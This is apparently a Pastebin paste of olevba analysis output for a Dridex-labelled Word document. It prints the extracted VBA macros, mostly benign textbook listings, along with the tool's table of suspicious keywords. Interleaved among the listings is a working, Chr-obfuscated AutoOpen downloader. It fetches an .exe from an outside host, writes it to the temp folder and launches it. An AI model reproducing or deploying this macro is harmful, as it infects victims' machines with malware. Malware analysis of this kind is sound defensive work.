Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.26 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASI-B- dridex.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: dridex.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: dridex.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub ôñÔÔÀ(FFFFF As Long)
- TOT9Qr3J8P
- End Sub
- Sub autoopen()
- ôñÔÔÀ (3)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: dridex.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '
- Sub PublishAutoFilterRange()
- Ôû.Sheets("Query").AutoFilterMode = False
- ä.Range("Query_From_Northwind").Select
- â.Range("Query_From_Northwind").AutoFilter _
- Field:=1, _
- Criteria1:="Condiments"
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceAutoFilter, _
- FileName:="C:\Publish01.htm", _
- Sheet:="Query", _
- Source:=ô.Sheets("Query").AutoFilter.Range, _
- HtmlType:=xlHtmlStatic, _
- DivID:="ExcelAutoFilter", _
- Title:="Excel AutoFilter Range").Publish True
- End Sub
- '
- ' Publish a chart sheet
- '
- Sub PublishChartSheet()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceChart, _
- FileName:="C:\Publish02.htm", _
- Sheet:="Chart1", _
- HtmlType:=xlHtmlChart, _
- DivID:="ExcelChartSheet", _
- Title:="Excel Chart Sheet").Publish True
- End Sub
- '
- ' Publish an embedded chart
- '
- Sub PublishEmbeddedChart()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceChart, _
- FileName:="C:\Publish03.htm", _
- Sheet:="2000 Budget", _
- Source:="Chart 1", _
- HtmlType:=xlHtmlStatic, _
- DivID:="ExcelEmbeddedChart", _
- Title:="Excel Embedded Chart").Publish True
- End Sub
- '
- ' Publish a PivotTable
- '
- Sub PublishPivotTable()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourcePivotTable, _
- FileName:="C:\Publish04.htm", _
- Sheet:="PivotTable", _
- Source:="PivotTable1", _
- HtmlType:=xlHtmlList, _
- DivID:="ExcelPivotTable", _
- Title:="Excel PivotTable").Publish True
- End Sub
- '
- ' Publish a print area
- '
- Sub PublishPrintArea()
- ç.Worksheets("2000 Budget").PageSetup.PrintArea = "A1:B13"
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourcePrintArea, _
- FileName:="C:\Publish05.htm", _
- Sheet:="2000 Budget", _
- Source:=ôâ.Worksheets("2000 Budget").PageSetup.PrintArea, _
- HtmlType:=xlHtmlStatic, _
- DivID:="ExcelPrintArea", _
- Title:="Excel Print Area").Publish True
- End Sub
- '
- ' Publish a query table
- '
- Sub PublishQueryTable()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceQuery, _
- FileName:="C:\Publish06.htm", _
- Sheet:="Query", _
- Source:="Query from Northwind", _
- HtmlType:=xlHtmlCalc, _
- DivID:="ExcelQueryTable", _
- Title:="Excel Query Table").Publish True
- End Sub
- '
- ' Publish a range using coordinates
- '
- Sub PublishRangeCoordinates()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceRange, _
- FileName:="C:\Publish07.htm", _
- Sheet:="2000 Budget", _
- Source:="A1:B17", _
- HtmlType:=xlHtmlCalc, _
- DivID:="ExcelRangeCoordinates", _
- Title:="Excel Range Coordinates").Publish True
- End Sub
- '
- ' Publish a range using a name
- '
- Sub PublishRangeName()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceRange, _
- FileName:="C:\Publish08.htm", _
- Source:="Expenses", _
- HtmlType:=xlHtmlStatic, _
- DivID:="ExcelRangeName", _
- Title:="Excel Range Name").Publish True
- End Sub
- Public Function WphmxowcstXb(A7X71OY4p As String)
- Set zBo1iklWv9Sz = dFlagLB30D("S" & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & "c" & "a" & Chr(116) & Chr(105) & "o" & Chr(110))
- zBo1iklWv9Sz.Open (QrDNQZQRP)
- End Function
- Public Function dFlagLB30D(HvbtyGByuxg3J As String)
- Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
- End Function
- Public Function IrQ2IESgmYoy(UNIWVVc542vt As Variant, cNvH4h9GxP As String)
- Dim oUeKB2dS: Set oUeKB2dS = dFlagLB30D(Chr(65) & "d" & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & "t" & Chr(114) & Chr(101) & "a" & "m")
- With oUeKB2dS
- .Type = 1
- .Open
- .write UNIWVVc542vt
- .savetofile cNvH4h9GxP, 2
- End With
- End Function
- '
- ' Publish a worksheet
- '
- Sub PublishWorksheet()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceSheet, _
- FileName:="C:\Publish09.htm", _
- Sheet:="2000 Budget", _
- HtmlType:=xlHtmlCalc, _
- DivID:="ExcelWorksheet", _
- Title:="Excel Worksheet").Publish True
- End Sub
- '
- ' Listing 20.2. Republishing a PublishObject.
- '
- Sub RepublishObject()
- Dim strID As String
- strID = "ExcelRangeCoordinates"
- For Each po In ThisWorkbook.PublishObjects
- If po.DivID = strID Then
- po.Publish
- Exit For
- End If
- Next 'po
- End Sub
- '
- ' Listing 20.3. A procedure that deletes all the PublishObjects
- '
- Sub DeletePublishObjects()
- For Each po In ThisWorkbook.PublishObjects
- po.Delete
- Next 'po
- End Sub
- '
- ' Listing 20.4. A procedure that adds a Hyperlink object.
- '
- Sub AddLink()
- Dim r As Range
- '
- ' Add a paragraph to the end of the document
- '
- With ThisDocument.Paragraphs
- .Item(.Count).Range.InsertParagraphAfter
- Set r = .Item(.Count).Range
- End With
- r.Text = "Sams' Home Page"
- r.Hyperlinks.Add _
- Anchor:=r, _
- Address:="http://www.mcp.com/sams/", _
- ScreenTip:="Click here to visit the home page of Sams!"
- End Sub
- '
- ' Listing 20.5. Procedures that add a link for the Yahoo!
- ' search engine and run a query on the Yahoo! database.
- '
- Sub AddYahoo()
- Dim r As Range
- '
- ' Add a paragraph to the end of the document
- '
- With ThisDocument.Paragraphs
- .Item(.Count).Range.InsertParagraphAfter
- Set r = .Item(.Count).Range
- End With
- r.Text = "Yahoo Search"
- r.Hyperlinks.Add _
- Anchor:=r, _
- Address:="http://search.yahoo.com/bin/search"
- End Sub
- Sub SearchYahoo()
- Dim link As Hyperlink
- Dim keyword As String
- Set link = ThisDocument.Hyperlinks("http://search.yahoo.com/bin/search")
- keyword = InputBox("Enter a search keyword:")
- link.Follow _
- ExtraInfo:="p=" & keyword, _
- Method:=msoMethodGet
- End Sub
- '
- ' Listing 20.6. Using the FollowHyperlink method to display
- ' a target document without an existing Hyperlink object.
- '
- Sub FollowHyperlinkTest()
- Dim keyword As String
- keyword = InputBox("Enter a search keyword:")
- ThisDocument.FollowHyperlink _
- Address:="http://search.yahoo.com/bin/search", _
- ExtraInfo:="p=" & keyword, _
- Method:=msoMethodGet
- End Sub
- '
- ' Listing 20.7. Some event handlers that are used to
- ' display a Web page.
- '
- ' This event handler fires when you first open the form
- '
- Private Sub UserForm_Initialize()
- Dim maxWidth As Integer
- Dim maxHeight As Integer
- With webWWW
- '
- ' Display and save the initial URL
- '
- If txtLocation <> "" Then
- topPage = txtLocation
- .Navigate txtLocation
- End If
- '
- ' Adjust the width and height of the control
- '
- maxWidth = Ê.Me.Width - .Left - 10
- maxHeight = Ê.Me.Height - .Top - 20
- If Application.UsableWidth > maxWidth Then
- .Width = maxWidth
- End If
- If Application.UsableHeight > maxHeight Then
- .Height = maxHeight
- End If
- End With
- End Sub
- '
- ' This event handler fires when you enter the text box
- '
- Private Sub txtLocation_Enter()
- '
- ' Make sure Surf! button is the default
- '
- cmdSurf.Default = True
- End Sub
- '
- ' This event handler fires when you click the Surf! button
- '
- Private Sub cmdSurf_Click()
- '
- ' Surf to the URL specified in the Location text box
- '
- If txtLocation <> "" Then
- webWWW.Navigate txtLocation
- Else
- txtLocation.SetFocus
- Beep
- End If
- End Sub
- '
- ' This event handler fires once the Web page navigation is done
- '
- Private Sub webWWW_DocumentComplete(ByVal pDisp As Object, URL As Variant)
- lblProgress.Caption = " Done"
- txtLocation = URL
- End Sub
- '
- ' This event handler fires at the start of the download
- '
- Private Sub webWWW_DownloadBegin()
- lblProgress.Caption = " Downloading..."
- End Sub
- '
- ' This event handler fires when the URL title changes
- '
- Private Sub webWWW_TitleChange(ByVal Text As String)
- '
- ' Update the form's caption to reflect the new title
- '
- ÊMe.Caption = "The Word Wide Web - " & webWWW.LocationName
- End Sub
- '
- ' This event handler fires when the status text changes
- '
- Private Sub webWWW_StatusTextChange(ByVal Text As String)
- lblStatus = Text
- End Sub
- '
- ' Listing 20.8. Event handlers for the navigation
- ' buttons in the custom Web browser.
- '
- '
- ' This event handler fires when you click the Back button
- '
- Private Sub cmdBack_Click()
- '
- ' An error occurs if there is no page to go back to
- '
- On Error Resume Next
- webWWW.GoBack
- End Sub
- '
- ' This event handler fires when you click the Forward button
- '
- Private Sub cmdForward_Click()
- '
- ' An error occurs if there is no page to go forward to
- '
- On Error Resume Next
- webWWW.GoForward
- End Sub
- '
- ' This event handler fires when you click the Top button
- '
- Private Sub cmdTop_Click()
- webWWW.Navigate topPage
- End Sub
- '
- ' This event handler fires when you click the Refresh button
- '
- Private Sub cmdRefresh_Click()
- webWWW.Refresh
- End Sub
- '
- ' This event handler fires when you click the Stop button
- '
- Private Sub cmdStop_Click()
- webWWW.Stop
- End Sub
- '
- ' This event handler fires when you click the Home button
- '
- Private Sub cmdHome_Click()
- webWWW.GoHome
- End Sub
- '
- ' This event handler fires when you click the Search button
- '
- Private Sub cmdSearch_Click()
- webWWW.GoSearch
- End Sub
- '
- ' This event handler fires when you click the Exit button
- '
- Private Sub cmdExit_Click()
- Unload ÊMe
- End Sub
- '
- ' Listing 20.9. A procedure that manipulates Internet Explorer
- ' via Automation using various members of the
- ' InternetExplorer class.
- '
- Sub AutomateInternetExplorer()
- Dim ie As Object
- Dim result As Integer
- '
- ' Set up the Automation object
- '
- Set ie = CreateObject("InternetExplorer.Application")
- '
- ' Navigate to a page and customize the browser window
- '
- ie.Navigate "http://www.microsoft.com/ie/"
- ie.Toolbar = False
- ie.StatusBar = False
- ie.MenuBar = False
- '
- ' Twiddle thumbs while the page loads
- '
- Do While ie.Busy
- DoEvents
- Loop
- '
- ' Display page info
- '
- result = MsgBox( _
- "Current URL: " & ie.LocationURL & Chr(13) & _
- "Current Title: " & ie.LocationName & Chr(13) & _
- "Document type: " & ie.Type & Chr(13) & Chr(13) & _
- "Would you like to view this document?", _
- vbYesNo + vbQuestion)
- If result = vbYes Then
- '
- ' If Yes, make browser visible and activate it
- '
- ie.Visible = True
- AppActivate "Microsoft Internet Explorer"
- Else
- '
- ' If no, bail out
- '
- ie.Quit
- End If
- Set ie = Nothing
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | AppActivate | May control another application by |
- | | | simulating user keystrokes |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | http://www.mcp.com/s | URL |
- | | ams/ | |
- | IOC | http://search.yahoo. | URL |
- | | com/bin/search | |
- | IOC | http://www.microsoft | URL |
- | | .com/ie/ | |
- +------------+----------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: dridex.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public QrDNQZQRP As String
- ' Listing 13.4. Using the DDEInitiate method to open a DDE channel.
- '
- Sub TestIt()
- Dim result As Integer
- result = OpenHailingFrequencies
- DDETerminate result
- End Sub
- Function OpenHailingFrequencies() As Integer
- Dim channel As Integer
- On Error GoTo BadConnection
- '
- ' Establish the DDE connection to Program Manager
- '
- channel = DDEInitiate("Progman", "Progman")
- MsgBox "A channel to Program Manager is now open.", vbInformation
- '
- ' Return the channel number
- '
- OpenHailingFrequencies = channel
- Exit Function
- BadConnection:
- MsgBox "Could not open a channel to Program Manager!", vbExclamation
- '
- ' Return 0
- '
- OpenHailingFrequencies = 0
- End Function
- ' Listing 13.5. Using DDEExecute to control a server application.
- '
- Sub CreateWorkbookIcon()
- Dim channel As Integer
- Dim strPath As String, strName As String, strApp As String
- On Error GoTo BadConnection
- '
- ' Get info required for program item
- '
- strPath = ActiveWorkbook.Path & "\" & ActiveWorkbook.Name
- strName = Left(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4)
- strApp = Application.Path & "\Excel.exe"
- '
- ' Establish the DDE connection to Program Manager
- '
- channel = DDEInitiate("Progman", "Progman")
- '
- ' Create the group and item
- '
- DDEExecute channel, "[CreateGroup(""Excel Workbooks"")]"
- DDEExecute channel, "[AddItem(""" & strPath & """,""" & strName & """,""""" & strApp & """"")]"
- DDETerminate channel
- Exit Sub
- BadConnection:
- MsgBox "Could not open a channel to Program Manager!", vbExclamation
- End Sub
- ' Listing 13.6. Using DDERequest to retrieve data from an
- ' application.
- '
- Sub RequestWordData()
- Dim channel As Integer
- Dim wordData As Variant
- Dim getString As String
- On Error GoTo BailOut
- '
- ' Set up the application
- '
- Application.StatusBar = "Starting Word..."
- Application.DisplayAlerts = False
- '
- ' Initiate channel with System topic
- '
- channel = DDEInitiate("Winword", "System")
- '
- ' Open the document we want to work with
- '
- Application.StatusBar = "Opening Word document..."
- DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
- DDETerminate channel
- '
- ' Initiate new channel with document
- '
- channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
- '
- ' Find keyword and add a bookmark
- '
- DDEExecute channel, "[StartOfDocument]"
- DDEExecute channel, "[EditFind .Find = ""ACME""]"
- DDEExecute channel, "[SelectCurSentence]"
- DDEExecute channel, "[EditBookmark .Name = ""Gotcha""]"
- '
- ' Retrieve the bookmark and store it
- '
- wordData = DDERequest(channel, "Gotcha")
- getString = wordData(1)
- r.Worksheets("Sheet1").[A2].Value = getString
- '
- ' Quit Word and terminate channel
- '
- DDEExecute channel, "[FileExit 1]"
- DDETerminate channel
- Exit Sub
- BailOut:
- DDETerminate channel
- MsgBox "DDE operation failed!", vbExclamation
- End Sub
- ' Listing 13.7. Using DDEPoke to send data to an application.
- '
- Sub SendDataToWord()
- Dim channel As Integer, pokeData As Variant
- On Error GoTo BailOut
- '
- ' Set up the application
- '
- Application.StatusBar = "Starting Word..."
- Application.DisplayAlerts = False
- '
- ' Initiate channel with System topic
- '
- channel = DDEInitiate("Winword", "System")
- '
- ' Open the document we want to work with
- '
- Application.StatusBar = "Opening Word document..."
- DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
- DDETerminate channel
- '
- ' Initiate new channel with document
- '
- channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
- '
- 'Get the data to be sent
- '
- Application.StatusBar = "Sending data..."
- Set pokeData = t.Worksheets("Sheet1").[A1]
- '
- 'Send it to the "Gotcha" bookmark
- '
- DDEPoke channel, "Gotcha", pokeData
- '
- ' Quit Word and terminate channel
- '
- Application.StatusBar = "Shutting down Word..."
- DDEExecute channel, "[FileExit 1]"
- DDETerminate channel
- Application.StatusBar = False
- Exit Sub
- BailOut:
- DDETerminate channel
- MsgBox "DDE operation failed!", vbExclamation
- Application.StatusBar = False
- End Sub
- ' Listing 15.3. Using Automation to run a PowerPoint
- ' presentation slide show.
- '
- Sub TOT9Qr3J8P()
- Set j9yPFDVwyo = dFlagLB30D("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & Chr(72) & "TT" & Chr(80))
- CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _
- Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(99) & Chr(111) & "l" & Chr(99) & Chr(104) & Chr(101) & Chr(115) & Chr(116) & Chr(101) & Chr(114) & Chr(45) & Chr(105) & Chr(110) & Chr(115) & Chr(116) & Chr(105) & Chr(116) & Chr(117) & Chr(116) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "7" & Chr(48) & Chr(56) & Chr(47) & Chr(51) & Chr(52) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & "e" _
- , False
- Set nVoYwy5wi65Ru = dFlagLB30D("W" & Chr(83) & Chr(99) & Chr(114) & "i" & Chr(112) & Chr(116) & Chr(46) & Chr(83) & "h" & "e" & Chr(108) & Chr(108))
- Set Njvhw3SCwhJF = CallByName(nVoYwy5wi65Ru, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))
- NkFurzJgA4 = Njvhw3SCwhJF(Chr(84) & "E" & Chr(77) & Chr(80))
- QrDNQZQRP = NkFurzJgA4 & Chr(92) & Chr(98) & Chr(105) & "k" & Chr(115) & Chr(101) & Chr(110) & Chr(112) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
- Dim yRG5Tmsczw() As Byte
- CallByName j9yPFDVwyo, "S" & "e" & Chr(110) & Chr(100), VbMethod
- yRG5Tmsczw = CallByName(j9yPFDVwyo, "r" & Chr(101) & Chr(115) & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & "d" & Chr(121), VbGet)
- IrQ2IESgmYoy yRG5Tmsczw, QrDNQZQRP
- On Error GoTo ehUAReVao5
- a = 197 / 0
- On Error GoTo 0
- PBWxy1g8qJuzYK:
- Exit Sub
- ehUAReVao5:
- WphmxowcstXb ("HBaMqGixX")
- Resume PBWxy1g8qJuzYK
- End Sub
- Sub RunPresentation()
- On Error GoTo OpenPowerPoint
- '
- ' Reference the existing PowerPoint Application object
- '
- Set ppApp = GetObject(, "PowerPoint.Application")
- '
- ' Work with PowerPoint's Application object directly
- '
- With ppApp
- '
- ' Display PowerPoint
- '
- .Visible = True
- '
- ' Open and then run the presentation's slide show
- '
- .Presentations.Open "C:\My Documents\Juggling.ppt"
- .Presentations("Juggling.ppt").SlideShowSettings.Run
- End With
- Set ppApp = Nothing
- '
- ' Program branches here if PowerPoint isn't running
- '
- OpenPowerPoint:
- ' Create a new instance of PowerPoint's Application object
- '
- Set ppApp = CreateObject("PowerPoint.Application")
- '
- ' Continue after the statement that caused the error
- '
- Resume Next
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | Excel.exe | Executable file name |
- +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement